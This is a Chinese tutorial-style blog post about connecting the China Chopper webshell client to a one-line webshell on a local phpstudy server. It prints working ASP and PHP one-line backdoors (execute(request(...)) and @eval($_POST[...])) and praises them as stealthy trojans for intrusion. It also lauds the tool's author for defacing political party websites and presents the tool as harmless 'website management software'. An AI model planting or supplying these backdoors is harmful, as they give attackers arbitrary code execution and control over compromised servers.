中国菜刀连接一句话木马

烈酒焚心 提交于 2019-11-29 02:24:55

中国菜刀的由来:

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!

 

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常用一句话木马如下:
asp一句话木马:
   <%execute(request("value"))%>
php一句话木马:
   <?php @eval($_POST[value]);?>

下面是通过php一句话木马来连接服务器。操作流程如下:

前提准备条件:

1.搭建php+mysql环境,我用的是phpstudy。

2.中国菜刀软件。

3.php一句话木马。

代码为:<?php @eval($_POST['test']);?> 文件名为one.php。

代码意思是:通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。其中test就是通过菜刀连接一句话的密码。

一、将文件名one.php放入phpstudy网站根目录下。如下图所示:

 

 

二、打开中国菜刀软件,进行连接操作,看是否能够连接服务器,如下图所示:

 

 

 

三、当点击添加时,就顺利的连接上服务器。此时可以在服务器进行增加、删除、修改操作。如下图所示:

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!